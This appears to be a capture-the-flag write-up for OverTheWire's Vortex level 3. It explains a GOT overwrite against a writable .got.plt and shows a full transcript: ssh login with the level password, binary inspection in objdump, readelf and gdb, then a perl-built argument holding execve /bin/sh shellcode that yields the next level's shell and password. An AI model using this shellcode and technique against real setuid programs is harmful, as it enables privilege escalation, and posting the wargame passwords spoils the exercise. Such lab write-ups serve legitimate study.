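# Vortex wargame: Level 3

The transcript below has three steps. `objdump` shows that `exit@plt` jumps through the GOT slot at `0x8049738`; the gdb `find` then searches the loaded image for words that hold that address; and one of the hits, `0x8049322`, is passed little-endian as the last four bytes of the argument. The `readelf` output lists `.got.plt` (which contains `0x8049738`) with the `WA` flag, meaning the slot is writable at run time; a binary linked with full RELRO would have a read-only GOT by the time `main` runs.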


# ssh vortex3@vortex.labs.overthewire.org
vortex3@vortex.labs.overthewire.org's password:36346e635854767823

$ file /vortex/vortex3
/vortex/vortex3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xfa95ff349b30e694b0106281d5c79e2b1ab997c2, not stripped
$ objdump --section=.plt --disassemble-all /vortex/vortex3 | grep -A 3 exit
08048320 <exit@plt>:
 8048320:       ff 25 38 97 04 08       jmp    *0x8049738
 8048326:       68 10 00 00 00          push   $0x10
 804832b:       e9 c0 ff ff ff          jmp    80482f0 <_init+0x3c>
$ readelf --sections /vortex/vortex3 | grep "\["
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .interp           PROGBITS        08048134 000134 000013 00   A  0   0  1
  [ 2] .note.ABI-tag     NOTE            08048148 000148 000020 00   A  0   0  4
  [ 3] .note.gnu.build-i NOTE            08048168 000168 000024 00   A  0   0  4
  [ 4] .gnu.hash         GNU_HASH        0804818c 00018c 000020 04   A  5   0  4
  [ 5] .dynsym           DYNSYM          080481ac 0001ac 000060 10   A  6   1  4
  [ 6] .dynstr           STRTAB          0804820c 00020c 000051 00   A  0   0  1
  [ 7] .gnu.version      VERSYM          0804825e 00025e 00000c 02   A  5   0  2
  [ 8] .gnu.version_r    VERNEED         0804826c 00026c 000020 00   A  6   1  4
  [ 9] .rel.dyn          REL             0804828c 00028c 000008 08   A  5   0  4
  [10] .rel.plt          REL             08048294 000294 000020 08   A  5  12  4
  [11] .init             PROGBITS        080482b4 0002b4 00002e 00  AX  0   0  4
  [12] .plt              PROGBITS        080482f0 0002f0 000050 04  AX  0   0 16
  [13] .text             PROGBITS        08048340 000340 0001ec 00  AX  0   0 16
  [14] .fini             PROGBITS        0804852c 00052c 00001a 00  AX  0   0  4
  [15] .rodata           PROGBITS        08048548 000548 000008 00   A  0   0  4
  [16] .eh_frame_hdr     PROGBITS        08048550 000550 000034 00   A  0   0  4
  [17] .eh_frame         PROGBITS        08048584 000584 0000c0 00   A  0   0  4
  [18] .ctors            PROGBITS        08049644 000644 000008 00  WA  0   0  4
  [19] .dtors            PROGBITS        0804964c 00064c 000008 00  WA  0   0  4
  [20] .jcr              PROGBITS        08049654 000654 000004 00  WA  0   0  4
  [21] .dynamic          DYNAMIC         08049658 000658 0000c8 08  WA  6   0  4
  [22] .got              PROGBITS        08049720 000720 000004 04  WA  0   0  4
  [23] .got.plt          PROGBITS        08049724 000724 00001c 04  WA  0   0  4
  [24] .data             PROGBITS        08049740 000740 000010 00  WA  0   0  4
  [25] .bss              NOBITS          08049750 000750 000008 00  WA  0   0  4
  [26] .comment          PROGBITS        00000000 000750 00002a 01  MS  0   0  1
  [27] .shstrtab         STRTAB          00000000 00077a 0000fc 00      0   0  1
  [28] .symtab           SYMTAB          00000000 000d28 000440 10     29  45  4
  [29] .strtab           STRTAB          00000000 001168 000216 00      0   0  1
$ gdb -q /vortex/vortex3
(gdb) break main
(gdb) run
(gdb) find 0x08048134,0x08049750,0x8049738
0x80482a4
0x8048322 
0x80492a4
0x8049322
(gdb) quit
$ /vortex/vortex3 `perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x106 . "\x22\x93\x04\x08"'`
$ /usr/bin/whoami
vortex4
$ /bin/cat /etc/vortex_pass/vortex4
32596d674b313d6a77
